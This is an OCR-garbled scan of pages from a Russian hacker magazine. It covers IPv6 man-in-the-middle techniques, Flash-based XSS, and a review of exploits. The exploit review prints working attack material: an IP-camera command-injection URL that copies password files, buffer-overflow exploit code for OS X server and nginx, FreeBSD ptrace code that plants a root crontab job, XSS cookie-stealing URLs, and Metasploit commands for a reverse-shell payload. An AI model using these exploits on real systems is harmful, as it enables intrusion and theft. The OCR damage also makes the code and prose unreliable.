ного хоста. Поэтому посылались широкове- 
щательные АВР-запросы, типа «кто ІР такой- 
то?». 

А что же в ІРѵб? Так как от базовой кон- 
цепции избавиться было нельзя (для под- 
ключения нужен МАО), решение оказалось, 
по сути, аналогичным. Был внедрен прото- 
кол ЫЭР — ЫеідИЬог Эізсоѵегу РгоіосоІ, часть 
обновленного протокола ІСМРѵб. 

Для того чтобы получить МАС-адрес, 
хост посылает специальный ІСМРѵб-запрос 
(ІЧеідНЬог Зоіісііаііоп — тип 135) на специ- 
альный тиШсазІ-адрес. Стоит отметить, 
что в ІРѵб избавились от ЬгоасІсазІ-адресов. 

Вместо них выделили определенные 
плиШсазІ-адреса, которые выполняют ту же 
функцию, — такие пакеты получают все хо- 
сты сегмента. Таким образом, хост, чей ІР 
указан в пакете, отвечает обратно ІСМРѵб- 
пакетом — ЫеідМэог Абѵегйзеплепі: (тип 136), 
в котором и указывает свой МАО (см. рис. 1 ). 

Как видишь, все выглядит очень при- 
годным для проведения МІТМ, а главное — 
таковым и является :). Можно спокойно 
флудить ІЧеідІіЬог Абѵегіізетепі: пакетами 
на хост жертвы, и он будет посылать данные 
нам (ЫЭР сасііе роізопіпд?) (см. рис. 2). 

Фактически атаку можно провести, ис- 
пользуя, например, утилиту рагазііеб из на- 
бора ТНС-ІРѵб аКаск Іооікіі ( аоо.дІ/Вѵіе8 ). 

Она отвечает ІЧА-пакетами на все 145- 
запросы в сети, так что злоумышленнику бу- 
дут видны все данные в сегменте сети. 

Второй вариант проведения МІТМ-атаки 
основывается на новой фиче ІРѵб — 5І.ААС. 

Эта аббревиатура расшифровывается 
как зіаіеіезз асісігезз аиіосопТідигаііоп и под- 
разумевает под собой возможность полу- 
чения сетевых настроек хостом в подсетях, 



где отсутствует ЭНСР-сервер. Фича эта очень даже удобная. Атакующий 
подключился в новую сеть, и — бац — у него есть все основные настройки: 
твой ІР, ІР шлюза и ЭІ\І5-сервера — то есть то, что обычно приходится про- 
писывать в ІРѵ4 без ЭНСР. 

А как работает эта технология? Очень просто. При подключении к сети 
сам хост генерит себе свой ІР-адрес, основываясь на МАС-адресе сетевой 
карты. После чего отправляет в сеть на специальный плиШсазі-адрес (аІІ 



2001 :с!Ь8: : 1 /64 

0000.0000.000а 



2001 :с!Ь8: : 1 /64 

0000.0000.000а 





Ѵісііт 

2001 :сІЬ8::2/64 

оооо.оооо.оооь 

ЫеідГіЬог Зоіісііаііоп 
I ЫеідНЬогАсІѵегіізетепІ 



АИаскег 
2001 :сІЬ8::3/64 

0000.0000.000с 



Ѵісііт 

2001 :сІЬ8::2/64 

ОООО.ОООО.ОООЬ 



АНаскег 
2001 :сІЬ8::3/64 

0000.0000.000с 



Рис. 1 . Протокол ЫОР 
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Рис. 3. Легальное применение ІСМРѵб Роиіег Асіѵегіізетепі 



Рис. 4. Легальное применение ІСМРѵб Ресіігесі 



гоиіегз тиШсазІ) запрос ІСМРѵб типа Роиіег ЗоІісКайоп (тип 133), чтобы по- 
лучить основные настройки от самого роутера (роутеров). Последние же, 
получив данный запрос, отправляют ответ Роиіег Асіѵегйзетепі (тип 134), 
и тоже на тиШсазі-адрес (что интересно, ответ уже адресуется всем) , в него 
и включают информацию для настроек. Все это чем-то смахивает на ЭНСР, 
но путать не следует, ведь в ІРѵб есть и свой ЭНСРѵб. 

Думаю, ты догадываешься, что атака здесь по идее своей аналогична 
предыдущей. Все, что необходимо атакующему, — посылать ІСМРѵб Роиіег 
Асіѵегіізеплепі пакеты в сеть. Это перезапишет имеющиеся настройки авто- 
конфигурации, и трафик от хостов пойдет к нему. Злоумышленник же его, 
в свою очередь, будем передавать дальше на роутер. Итог — МІТМ полу- 
чена. Фактически произвести эту атаку можно, опять-таки используя тулзу 
от ТНС — Такегоиіегб. 

Еще раз подчеркну, что какой-то встроенной защиты от перезаписи 
настроек здесь изначально нет. Один пакет — одна запись. Сколько-то но- 
меров назад я как раз писал про отличный Эо5 против всех современных 
ѴѴіпсІоѵѵз-систем — флудинг такими РА-сообщениями (используя ТІоосІ_ 
гоиіегб ТНС). Падение происходит буквально за секунды, а от атакующего 
почти ничего не требуется. 

Хорошо. И наконец, последний вид МІТМ-атаки. О его версии для ІРѵ4 
я писал в одном из последних номеров — это ІСМР Ресіігесі:. Напомню, 
что роутер может послать на входящий пакет от хоста ІСМР-сообщение 
о том, что есть более «правильный» маршрут для трафика, через такой-то 
другой роутер. Таким образом, если подделать такой пакет и послать его 
от имени роутера нашей жертвы, дальнейшие данные жертва будет пускать 
через нас. 

Как ни странно, но этот функционал перекочевал и в ІРѵб. Когда роутер 
обнаруживает более корректный маршрут для трафика от какого-то хоста, 
он отправляет ему ІСМРѵб запрос Ресіігесі: (тип 137). После чего хост меняет 



роутер, используемый для пересылки данных, на тот, что указан в запросе. 
По сути — все то же (см. рис. 4). Но в ІРѵб был внедрен некий метод защиты: 
роутер должен вернуть в ІСМРѵб Ресіігесі: запросе весь пакет, для которого 
роутер нашел лучший путь. Да, кажется, тут возникает проблема? Но умные 
дяди из ТНС уже подумали за нас. Решение есть, и остроумное. Если роу- 
тер должен ответить ІСМР с проблемным пакетом, то для подделки запроса 
от роутера мы должны сделать так, чтобы мы знали тело пакета. Как этого 
добиться? Для начала давай представим себе саму ситуацию перед атакой 
(см. рис. 5). Здесь А — хост жертвы, X — хост атакующего, С — хост, куда 
жертва посылает данные (то есть то, что мы хотим перехватить). И роутер 
В — это тот, через который бежит трафик от А к С. Фактически же атака реа- 
лизуется такой последовательностью: 

1. Злоумышленник со своего хоста посылает ІСМРѵб Есііо Редиезі: запрос 
(он остался неизменным по сравнению с ІСМРѵ4) на хост А, но в поле 
зоигсе ІР (от кого) указывает хост С. 

2. ХостА, получив такой пакет, ответит хосту С ІСМРѵб Есііо Реріу пакетом. 

3. Злоумышленник создает ІРѵб ІСМР Ресіігесі:- пакет и посылает его от име- 
ни роутера (опять-таки подделывая зоигсе ІР) на хост А, с указанием ис- 
пользовать для доступа к хосту С роутер X (то есть нашу машину). 

Важнейший момент заключается в том, что при атаке можно добавить 
в Ресіігесі:- пакет Есііо Реріу пакет. После этого данные должны потечь че- 
рез нас. Для реальной эксплуатации можно воспользоваться тулзой гесіігб 
из того же набора ТНС. 

Как видишь, протокол изменился, но атаки, которые можно провести, 
остались в основе своей прежними. Напоследок извинюсь за достаточно 
сильное упрощение терминологии ІРѵб и множественные аналогии из ІРѵ4. 
Это чтобы было проще понять и не объяснять все новые особенности и тон- 
кости. 





шшшс 
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Рис. 5. Составляющие МІТМ через ІСМРѵб Ресіігесі 
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ПРОВЕСТИ ХЗЗ-АТАКУ ЧЕРЕЗ ПАЗН 



РЕШЕНИЕ 

Думаю, что такое РІазІі в общем, всем понятно. Это нечто большое, страш- 
ное, местами красивое. Через что многих ломали и ломают (хотя, конечно, 
в последнее время с ^ѵа вряд ли кто-то может сравниться). Поговаривают, 
что РІазІі помирает под натиском НТМІ_5. Но с учетом того, как много в себя 
вобрал РІазІі, какую часть рынка он занимает, смерть этой технологии еще 
совсем не близка... 

Вообще, я думал пробежаться по основным проблемам во флеше со сто- 
роны веб-безопасности (то есть без всяких переполняшек), но предыдущие 
вопросы заняли слишком много места, а тема оказалась и большой, и инте- 
ресной. Так что начну с базовых проблем, а в следующих номерах копнем 
глубже. 

Итак, как ни странно, РІазІі имеет достаточно много встроенных воз- 
можностей. В контексте веба мы в основном имеем дело с ЗѴѴР’ками. 
Они представляют собой байт-код, который исполняется плагином бра- 
узера. Во флеше, используя возможности таких языков, как АсѣіопЗсгірІ; 
2 и АсѣіопЗсгірІ; 3, можно почти все. Ограничения примерно идентичны 
^ѵаЗсгірІ’у. То есть из флеша (запущенного с сайта) нельзя добрать- 
ся до локальных файлов компьютера, например. Что еще интересней, 
из АсІіопЗсгірІ’а мы можем вызывать 38, и он будет исполнен в контексте 
сайта, на котором он запущен. 

Вот об этом мы сегодня и поговорим. Как можно сделать ХЗЗ’ку через 
флеш-ролик на сайте? Во-первых, это сделать можно. Во-вторых, провер- 
нуть это почти также просто, как и ХЗЗ’ку в обычной ситуации. А что обычно 
нужно злоумышленнику? Ему нужно, чтобы он мог вводить (передавать) не- 
кие данные ролику, которые не фильтровались бы им и попадали в то место, 
где они могут быть исполнены. 

О’кей, получается, есть три составляющих. Первое — передача данных 
в видеоролик. Стоит отметить, что ролик может быть запущен либо класси- 
чески через страничку: 

<оЬіес1: ісІ= , тоѵіе' ыісІ1:Іі="200" Ііеі^Іі1:="15Ѳ"> 

<рагат пате=диа1і1:у ѵа!ие=Ііі%Іі> 

<рагат пате="тоѵіе" ѵа1ие= ,, ІіІ:1:р:/Іі05І:/1:е5І:.5іл/-Р ,, > 

<етЬесІ пате='тоѵіе' згс="Іі1:1:р://Ііо5І:/тоѵіе.5іл/-Р" <-» 

диа!і1:у=Ііі%Іі 1:уре="арр1іса1:іоп/х-5Ііоскыаѵе--Па5Іі" <-■ 

ыіс і 1: Іі="2ѲѲ" Іі е_і^1і1: = " 1 5Ѳ"> 

</етЬесІ> 

</оЬіес1:> 

а также напрямую в ІІВІ_’е (см. ниже), либо в іігате/ігапле. В данных случаях 
браузер автоматически генерит саму страничку (она имеет сходный с указан- 
ным выше кодом вид) и запускает ЗѴѴР’ку. 

Передать же параметры ЗѴѴР’ке можно тремя путями: 

1. ІІРНОиегуЗігіпд. Типа: НІІр:/Дю5І/Моѵіе.5ѵѵГ?раг1=ѵаІ1 &раг2=ѵаІ2. 

2. Через параметры на страничке РІазІіѴаг: 

<рагаш паше=Р1а5ІіѴап5 ѵа1ие="раг1=ѵа11&раг2=ѵа12"> 

3. Запросив их из самой ЗѴѴР’ки: 

ѵаг ѵагз= пем І-оасІѴагП; 

ѵагз .ІоасК ' Іііііір : //Іі 05 І:/ра§е ' ); 

Хорошо. Данные, предположим, злоумышленник передал. Но что даль- 
ше? Дальше мы должны найти место, где ЗѴѴР’ка их использует, и по воз- 
можности модифицировать наши данные так, чтобы это привело к выполне- 
нию ^ѵа5сгірІ-кода. 

Здесь я сделаю небольшое отступление. Еще в 2006-2007 годах Стефа- 
но ди Паола (крутой профи) сделал отличный ресерч РІазІі ’а (мое «решение» 
основано главным образом на тех его работах) и нашел множество различ- 
ных мест, где можно было внедрить ^ѵаЗсгірІ. Но исследование его каса- 
лось, во-первых, в основном АсііопЗсгірІ 2. Разница между АсііопЗсгірІ 2 

Разница между АсііопЗсгірІ г 
и АсііопЗсгірІ з приличная, и поэто- 
му многие трюки не прокатывают 



и АсііопЗсгірІ: 3 приличная, и поэтому многие трюки не прокатывают (а но- 
вых не появилось), да и плюс АсііопЗсгірІ 3 роликов стало гораздо больше. 
К тому же вто время еще были распространены флеш-плееры 6-й и 7-й вер- 
сии, в которых сама модель безопасности была гораздо хуже. Сам АбоЬе с 
тех пор выпустил уже много версий РІазІі ’а и в каждом закручивал и закру- 
чивал гайки. Так что доступных триков стало прилично меньше, а адекват- 
ную и точную информацию об оставшихся не так просто найти. Но работы 
Стефано ди Паолы обязательно глянь, также помочь может ОѴѴАЗР- проект 
по РІазІі’у ( аоо.аІ/хсІХоР ). Но вернемся ко второй части — опасному функ- 
ционалу. Куда же должны прийти наши данные? 

Немного покопавшись, я выявил следующий список (не могу быть уве- 
рен в его точности): 

• паѵідаІеТоІІНІ_() 

• ІоасІѴагіаЫезО 

• ІоасІМоѵіе() 

• деШРЦ) 

• РЗсгоІІРапе.ІоасІЗсгоІІСопІепІО 

• І_оасІѴаг5.ІоасІ 

• І-оасІѴагз.зепсІ 

• ХМЫоасІ ( 'игГ ) 

• І_оасІѴаг5.ІоасІ ( ’игГ ) 

• 5оипсІ.ІоасІ5оипсІ( 'игГ , ізЗІгеагпіпд ); 

• І\Іе151геапл.рІау( 'игГ ); 

• ІІазІі.ехІегпаІ.ЕхІегпаІІпІегІасе.саІІ(_гоо1.саІІЬаск) 

• ІіІплІТехІ 

Как эксплуатировать? Фактически почти вся фишка завязана на ис- 
пользовании схемы «іаѵазсгірі:». Да -да, вот так вот просто. Например, рас- 
пространенный А32-КОД для ІІазИ-баннеров, чтобы осуществлялся переход 
по ссылке: 

ееШ*и_гооі.иг1. " Ыапк"У. 

Загрузив флешку с параметром, атакующий получит отраженную ХЗЗ: 

ІтЕ'Ер: //Ііозіі/Моѵіе. 5ы-Р?ип1=^аѵа5сгір1: : аІегЕГсІоситепІ: . соокіе) ; 

А, чуть не забыл. В А32 есть такая прикольная фича. Все неинициализи- 
рованные переменные мы можем перезаписать своим значением из пара- 
метров, передаваемых ЗѴѴР’ке. То есть если даже ІІВІ_ не был бы нигде ини- 
циализирован в ЗѴѴР’ке, то туда все равно попадет наше значение из циегу 
зігіпд. Очень прикольный момент. Жаль, что в А53 это уже не работает. Там 
в коде должен быть прописан «полный путь» получения данных. 

Еще один пример был когда-то найден на сайте Соодіе (ЗѴѴР-аплоадер 
в СтаіІ’е в 2010 году): 

ѵаг ЯазІіРагатз : * = І-оасІегІп-РоГііІііз . гооі: . Іоасіегіп-Ро^ .<-■ 
рагатеііегз ; 



АРІ Ю = "аріісі" іп ЛазІіРагатз ? <-■ 
(31:гіп^(Яа5ІіРагат5 .аріІсШ : 



АРІ_ІІ\ІІТ = "арііпіі:" іп ЛазІіРаг атз ? <-■ 
(БІігіп^ЯазІіРагатз . аріІпіЮ ) : Г'опЦрІоасІегАріКеасІѵ"’) ; 



ІТ (Ехііег паііпііег-Расе . аѵаіІа Ь Іе’) -Г 

Ехігегпаііпііег-Расе. саІКАРІ ІІМІТ, АРІ_ІР) ; 

ь_ 

Для эксплуатации всего лишь надо открыть НІІрз://таіІ.доодІе.сот/таіІ/ 
ирІоабег/ирІоабегарі2.з\л/1?аріІпіІ=еѵаІ&аріІб=аІегІ(сІоситеп1.соокіе). 

Как видишь, все просто :). Несмотря на грустные слова о закручива- 
нии болтов адобой, могу тебе точно сказать, что ХЗЗ’ок в интернете через 
РІазІі — пруд пруди. В том числе и на крутых сайтах. Ведь чем извращенней 
вектор атаки, тем выше шанс того, что программист об этом и не подумал. 
В качестве примера погугли олдскульную багу «іпигі :сІіскІад ІіІеІуре:зѵѵІ». 
Это как раз классический пример с деШВІ_. 

На сей приятной ноте прекращаю поток мыслей. Надеюсь, что было ин- 
тересно :). Если есть пожелания по разделу Еазу Наск или жаждешь поре- 
серчить — пиши на ящик. Всегда рад :). 

И успешных познаний нового! 31 
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1ѴАІШШС 

Вся информация предо- 
ставлена исключительно 
в ознакомительных целях. 

Ни редакция, ни автор не несут 
ответственности залюбой воз- 
можный вред, причиненный 
материалами данной статьи. 



В текущем обзоре эксплойтов будут 
освещены многочисленные уязвимо- 
сти в ІР-камерах, благодаря которым 
можно как получить доступ к видеопо 
току, так и выполнить команды в ОС. 
Кроме того, разберем последние 
уязвимости в 05 X и РгееВЗР. 



Борис Рютин, ЦОР (Езаде І.аЬ) 

сІикеЬагтап@хакер.гті, 

@сІикеЬагтап 



ОБЗОР ' 
ЭКСПЛОЙТОВ 



АНАЛИЗ СВЕЖЕНЬКИХ УЯЗВИМОСТЕЙ 



МНОГОЧИСЛЕННЫЕ УЯЗВИМОСТИ 
В 2АѴІ0 ІР САМЕРАЗ 

СѴ88ѵ2 ІЧ/А 

Дата релиза: 28 мая 2013 года 

Автор: Соге Зесигііу — СогеІаЬз Асіѵізогу 

СѴЕ: 2013-2567, 2013-2568, 2013-2569, 2013-2570 

Для реализации веб-интерфейса ІР-камера использует веб-сервер Воа (ЫТ 
іуДа!71еЗ), один изсамыхпопулярныхдлявстроенныхІ_іпих. У негоесть особен- 
ность: в его файле с конфигурацией Ьоа . соп-Р прописаны дефолтные пароли: 

# МРТ : Зресі-Рѵ тапи-РасЕиге сотшапсІБ изег пате апсі раззыргсі 
МГТ тап иТасІіиге егиІіса-Ри пат 



что позволяет любому желающему обратиться к нескольким системным ССІ- 
файлам в папке /с§і-Ьіп/птР1:/: 



• тапиТасІіиге. с§і; 

• ыіге1е55_тТі:.с§і. 

Также этот системный пользователь не виден в веб-панели, благодаря чему 
можно скрытно выполнять свои действия. Теперь рассмотрим примеры экс- 
плуатации с использованием полученных данных. 

ЕХРДОІТ 

В файле /с§і-Ьіп/тТі:/ыіге1е55_тТі:. с§і есть параметр ар. Он позволяет 
передать системную команду и выполнить ее. И конечно же, первым делом 
можно попытаться получить заветные пароли: 

Ыііір : //192 . 168 . 1 . ІѲѲ/с^і-Ьіп/тТІі/мігеІеББ тТ1:?ар=1=паѵе5І=і ;<-■ 
ср%20/уаг/млм/5есге1: . ра55ысІ%2Ѳ/ыеЬ/ІгІ:т1/сгесІепсіа1е5 

Теперь, обратившись по следующему адресу, можно получить скопирован- 
ные данные: 

ІтЬ’Ьр : //192 . 168 . 1 .100/сгесІепсі_а1е5 
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Следующая уязвимость пригодится разведчикам или просто любителям 
подглядывать. По умолчанию аутентификация для протокола ПТЗР отключе- 
на, и атакующий может получить доступ к видеопотоку, просто обратившись 
по адресу: 

гіізр : //192 .168.1. ІѲѲ/ѵісІео . Іі2б4 

Вот поэтому я всегда заклеиваю «глазок» веб-камеры, а то мало ли что :). 

Помимо эксплойтов под эти уязвимости, команда Соге Зесигііу опублико- 
вала исследование для ІР-камер от других производителей. Среди них такие 
вендоры, какТР-І_ІІ\ІК, МауСіоп и другие. У многих такая же проблема: они ис- 
пользуют веб-сервер Воа, поэтому атаки в некоторых случаях будут схожи. 
Правда, в отличие от этого вендора, остальные ответили и выпустили патчи. 

ТАПСЕТ8 

Прошивки с версией 1 .6.03 и ниже. 

80ШТІ0Ы 

Патча на момент написания статьи не существует. Авторы уязвимостей сове- 
туют несколько способов, которые помогут снизить риски: 

• Не открывать доступ к камере из интернета без особой необходимости. 

• Включить аутентификацию для РТЗР 

• Настроить прокси с фильтром запросов к тапи-Расіиге. с§і, \л/іге1езз_ 
т-Рі:.с§і. 

• Проверять параметр бепега1.Тіте.І\ІТР.5егѵег в запросе к /орі/с§і/ 
ѵіеы/рагат. 

ПЕРЕПОЛНЕНИЕ БУФЕРА 
В 0$ X ЗЕРѴЕР ШРЕСТОРѴЗЕРѴІСЕ 

СѴ55ѵ2: 9.3 (АѴ:В/АС:М/Аи:Ы/С:С/І:С/А:С) 

Дата релиза: 4 июня 2013 года 

Автор: Соге Зесигііу — СогеІаЬз Абѵізогу 

СѴЕ: 2013-0984 

Уже названная зесигііу- команда отличилась не только результатами исследо- 
вания различных ІР-камер, также она обнаружила уязвимость в ОЗ X Зегѵег. 
Уязвимость находится в функции ОЗТСРЕпсІроіпі: :АІІосРготРгоху5ігисі файла 
ОЗТСРЕпсІроіпі.срр. Кстати, его исходники доступны онлайн ( Ьіі.Іѵ/ІЗбРІЬѴ ). 
Атакующий может контролировать іпРгохуОаіаМзё-^ОаІіаБіге и данные, 
которые будут скопированы, что позволяет отправить большое количество ин- 
формации и маленький размер буфера. После чего сервис попытается полу- 
чить доступ к невыделенному блоку памяти и упадет. 

ЕХРЮІТ 

Теперь рассмотрим сам эксплойт, который вызывает падение сервера (при 
желании можно сделать выполнение своей команды): 

сІеТ а1=1=аск( ір . рогЕ): 

р_=_ 50ск е1і.зоск е1:( ) 

р. соппесі( (ір, рогі)) 

сіаіа = " " 

сіаііа += "РНІМ2" 

// Ключ генерируется как РЕКІѴЕР КЕУ, 

// идентичный полученному 

сіаііа += "\хѲѲ" * 63 + "\хѲ2" 

// Пакет 1 

ргіпі ("\п$епсІіп% ту риЬІіс кеу 

зепсі раскеі=(р, сіаііа) 

гезр = р. гесѵ(бББЗб) 

// Посылаем ключ серверу 

кеу_зеп1і = гезр[8: Іеп (гезр) - 1] 

зегѵег кеѵ = "" 

// Переворачиваем число 

Тог і іп га п^е(1еп (кеѵ_з еп1:) - 1, -1, -1): 
зегѵегкеу += кеѵ_зеп1:[і] 

// Трансформируем строку в большое число 

Ь і^ пигпЬег = "" 

-Рог с іп зегѵег кеу: 

Ьі^ пигпЬеп += "%.2х" % огсі(с) 

Ь і^ питЬег = іп1і(Ь іе питЬег. 16) 

ргіте = 2 ** 128 

// Получаем 5НАКЕР КЕУ, который используется 

// для АЕБ-шифрования 



сіегіѵесікеу = ром(Ьі§_питЬег , 1, ргіте) 

та^іспитЬег = сіегіѵесікеу 

сіегіѵесі кеѵ зігіп^ = "" 

// Трансформируем ключ в строку 

шЬіІе ша^іс пит Ьег != 0: 

гезііо = та^іспитЬег % 256 

та^іспитЬег /= 256 

сіегіѵесі кеу зіігіп^ += зігисі.раск("В", гезііо) [0] 
сіаііа = "А" * 4 + ("\х Ѳ с" * 12) 

сгурііесісіаііа = §е1=_спур1=есІ_сІа1=а<-і 

(сіегіѵес і кеѵ зііг іпе. сіаіа) 

зепсі раске1:(р. сгѵрііесі сіаіа) 

гезр = р, песѵ(65536) 

сіаіа = " " 

сіаііа += "А" * ѲхІЬ 

сіаіа += "\хѲ2" 

// Атакующее значение 

сіаіа += зііписі: . раскСЧі" , 0x10000000) 

// Значение, которое использовалось 

// для последней пропатченной версии 

сіаііа += з1:гисі:.раск("<1" , 0x100) 

сіаііа += "А" * ( 0x34 - 1еп(сІа1:а) ) 
сіаііа += з1=гис1:.раск (">1" , 0x1 172 + 1) 
сіаііа += зііписі: . раск(">1" , 0x99999999) 

сіаііа += зііписі:. раск( ">І" , 0x80808080) 

сіаііа += з1іпис1і.раск(">1" , Ѳх8181818Я 

сіаііа += зііписі: . раск(">1" , Ѳхбббббббб) 

// Проходило в прошлых версиях 05 X 

// (переполнение целочисленного числа -> 

// ( ( ѲхеѲ + 0x10 ^ - 0x100 )) 

сіаііа += "В" * (ѲхеѲ - Іеп(сіаііа)) 

сіаііа += "\хѲѲ" * 16 

сгурііесі сіаііа = ^еі сгуріесі сіаіа^ 

(сіегіѵесі кеѵ зі: г іп^, сіаііа) 

// Триггер 

зепсі раске1і(р. с гуріесі сіаііа ) 

р. зе1:1іітеои1:(10) 

.. : 

р. гесѵ(65536) 

ехсері Ехсерііоп. е: 

ргіпі е 

р.с1озе() 

Полные исходники можно скачать с сайта ехрІоіі-сІЬ ( Ьіі.Іѵ/121ксАа ). Для запу- 
ска сплоита нужно будет установить библиотеку РуСгуріо. 

ТАНСЕТ8 

ОЗХ 10.6.8 Зегѵег (х86_64) и ниже. 

80ШТІОЫ 

Есть исправление от производителя. 

РРЕЕВЗБ 9.0-9.1 М МАР/РТР АСЕ — 

ЭКСПЛОЙТ ОБХОДА ПРИВИЛЕГИЙ 

СѴ88ѵ2: Ы/А 



Дата релиза: 


18 июня 2013 года 


Автор: 


Копзіапііп Веіоизоѵ, АІап Сох, ЗупО 


СѴЕ: 


СѴЕ-2013-2171 



Система виртуальной памяти РгееВЗР реализует адресные пространства, 
в которые могут отображаться источники данных, например файлы. При этом 
все части файла можно сделать доступными для процесса в рамках одного 
адресного пространства. Так процесс, используя операции через память, мо- 
жет работать с файлом намного эффективнее, чем через обычные І/О-вызовы . 
В свою очередь, системный вызов рігасе предоставляет средства трассировки 
и возможность отладки одному процессу (трассирующему) для другого (трас- 
сируемого). Сама уязвимость заключается в отсутствии должной проверки 
прав в виртуальной памяти системы, что позволяет трассирующему процессу 
получить права доступа кобластям памяти трассируемого процесса, ккоторым 
у самого трассируемого процесса нет доступа. Проблема может привести, на- 
пример, к тому, что, используя вызов плплар для доступного только на чтение 
файла, можно получить доступ на запись к связанным с данным файлом обла- 
стям памяти. 
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ЕХРДОІТ 

С момента анонсирования уязвимости появилось несколько эксплойтов. 
Ниже приведена основная часть самого первого и простого из них от мем- 
бера форума Вбоі: с ником ЗупО. Этот эксплойт прописывает свою команду 
к /е1:с/сгоп1:аЬ: 

сііаг 5с[ ] = "*\1=*\1=*\1:*\1=*\1=гоо1=\1=/1:тр/Ьикеке\п#" ; 

ѵоісі С І1 ІІСІО { 



5І:а1:и5 = рігасе(РТ_ТКАСЕ_МЕ. Ѳ. Ѳ. ѲѴ. 

} 



-РсІ = ореп("/е1=с/споп1=аЬ" . 0КР0ІМІ.УѴ. 

асИг = ттар(Ѳ. 4096. РКОТ КЕАР. МАР ЗНАК ЕР. -Рек 0); 

рісі = -РогкП; 

сіііісіО ; 

рііпас е ( РТ АТТАСН . рісі, 0, 0); 

-Рог(і=Ѳ: і < БІгео-РРзс^М ; і++) 

р1:гасе(РТ_ІлІКІТЕ_Р. рісі. асИг+і*4. *(іп1:*’)&5с[і*4] ); 

В результате добавляется строка *\1:*\1=*\1=*\1:*\1:поо1:\1:/1:тр/Ьикеке\п# 
в наш сгопіаЬ, после чего происходит постоянное выполнение файла /1:тр/ 
Ьикеке с правами администратора. А уж в папку Іплр можно добавить все, 
что угодно. 

Исходники всех эксплойтов приведены в теме на форуме Всіоі: ( Ьіі. 

Іу/ІЗЗѵРІЗ ). 

ТАПСЕТ8 

РгееВЗЭ 9.0/9. 1. 

80ШТІ0Ы 

Можно произвести обновление системы до 9.1 -ПЕІ_ЕАЗЕ-р4 или 9.1-5ТАВІ.Е 
либо запретить непривилегированным пользователям выполнение рітасе 
с помощью команды 

# бѵбсііі зесигіфѵ. Ьбсі . ипргіѵііе^есі ргос сІеЬи^=0 



ПЕРЕПОЛНЕНИЕ БУФЕРА В МСІМХ 



СѴ88ѵ2: 


ІЧ/А 


Дата релиза: 


16 мая 2013 года 


Автор: 


Сгед МасМапиз, Мегі 8АПІСА 


СѴЕ: 


2013-2028 



Рассмотрим последнюю уязвимость в популярном сервере пдіпх. Перепол- 
нение стека находится в функции п§х_ІтІ:1:р_раг5е_сІіипкесІ() файла /Ы:1:р/ 
п§ х _Мі1:р_рап5е . с:. Уязвимость вызвана недостаточной проверкой входящих 
запросов, что позволяет атакующему, отправив специально сконструирован- 
ный запрос, вызвать падение сервера или выполнить произвольный код. Ис- 
правление этой уязвимости заключается в небольшом патче, в котором добав- 
ляется проверка на длину и размер запроса: 

і-р (с1=х->5І2е < 0 | | с1=х- >1еп^1=Ь < 0) { 

%оТо іпѵаіісі; .. _ 

} 

ЕХРДОІТ 

Запрос, вызывающий падение сервиса, выглядит следующим образом: 
сІ05_раске1= = ѲхРРРРРРР РР РРРРРЕС 



сіе-р с!іипк(сІа1:а. сііипк зіге^) : 

сііипкесі = 

сИипкес! += "%б\г\п" % (сІіипкБІге’) 
сііипкесі += "%б\г\п" % (сіаііа ) 

сііипкесі += "0\п\п\г\п" 

геіит сііипкесі 



Ьосіѵ = "ехріоіі:" 

сііипк 5І2Ѳ = ііѳхРсіоб раскеі: + 1 ^ [ 3 : ] 

сІіипкБІіе = ("Р" + сІіипк_5І2е:1еп(сІіипк_5І2е)-1 ().иррег() 
соп = Іт1=1:р1іЬ.НТТРСоппес1=іоп(ІіоБІ=) 

ипі = "/шегІіБагіса. ріір" 

соп.ри1=педие5І=( ' Р05Т' . ипі) 

соп.риІіІіеасІеК ' Цзег-А^епі: ' . "сиг1/7. 30.0") 

соп . ри1:ІіеасІег( 'Ассері: 1 . "*/*") 

соп . ри1:ІіеасІеп( 'ТгапБ-Реп-ЕпсосИп^' . ' сііипкесі ' ) 

соп . риіііеасіег ( ' Сопіепіі -Тѵре ' . <-■ 

"арр!іса1:іоп/х-ыілДл/--Рогт-иг1епсосІесІ"’) 

соп.епсІІіеасІепБО 

соп . БепсІРсІіипкРЬосІу . сНипк бііѳ: І епРсІіипк зіге) ()) 

Как видим, большое значение размера запроса ѲхРРРРРРРРРРРРРРЕС 
вызывает переполнение. Доступен Меіазріоіі- модуль для пдіпх под ІІЬипІи 
и ЭеЫап, который позволяет не просто провести ЭоЗ-атаку, а, например, от- 
крыть порт. Пример запуска приведен на скриншоте. 

Также есть пример эксплойта для 64-битных систем, нюансы эксплу- 
атации и сам эксплойт можно найти в статье от исследователя ѵѵООсІ ( Ьіі. 
Іѵ/ІІРСоСІ ). 

ТАПСЕТ8 

1. 3.9-1. 4.0. 

80ШТІ0Ы 

Есть исправления от производителя. 



ВЫПОЛНЕНИЕ КОДА В 0КАС1.Е ѴѴЕВСЕМТЕР 
СОМТЕМТ ЗЕКѴЕГС 



СѴ88ѵ2: 


4.0 (АѴ:П/АС:Е/Аи:5І/С:М/І:І\І/А:Р) 


Дата релиза: 


5 июня 2013 года 


Автор: 


гдосі 


СѴЕ: 


2013-1559 



Ошибка возникает в АсІіѵеХ-библиотеке СІіескОиІіАпсІОреп.сІІІ, в методах 
орепІлІеЬсІаѵ(). Можно передать специально созданный путь и выполнить его 
через БИеІІЕхесиІіеЕхІлІ. 

ЕХРДОІТ 

Сам эксплойт прост: 

<Ы=т1> 

<ЬосІѵ> 

<оЬ^ес1= ісІ="1=аг^е1=" ыісІ1=Іі="1ѲѲ%" Ііеі^Іі1=="1ѲѲ%" сіэббісі^ 
"сібісі :А2ѲѲР7А4-СА91 -4165 -9885 -АВ618А39ВЗРѲ"></оЬіес1=> 

<5СГІр1=> 

іаг%е1: . орепЫеЬсІаѵР "ПУТЬ" ) ; 

</ 5СГІр1:> 

</ЬосІу> 

</Іі1:т1> 

А вот в качестве пути можно передать ссылку на НТА-файл со встроенными 
ѴВЗ-скриптами — в Меіазріоіі-модуле так и делается, поскольку такие файлы 
позволяют более плотно работать с ОС. Эксплуатация с помощью Меіазріоіі: 
выполняется следующими командами: 

ШБ-Р > изе ехр1оі1:/ыіпсІоы5/Ьпоы5еп/^-< 

опасІеыеЬсепІіегсІіескоиІіапсІореп 

ШБ-Р ехріоіі: (огасіе ыеЬсепІіег сііескоиііапсіореп) > <-■ 

зеі: РАУШАР і\/іпсІоі\/5/те1:егрге1:ег/геѵег5е_1:ср 

тз-Р ехр!оі1і(опас1е_ыеЬсеп1:еп_сІіескои1:апсІореп^ > <-■ 
зеі 192.168.24.141 

ШБ-Р ехрІоіІіРогасІе іл/еЬсепІіег сІіескоиІіапсІореп 4 ) > ехріоіі: 



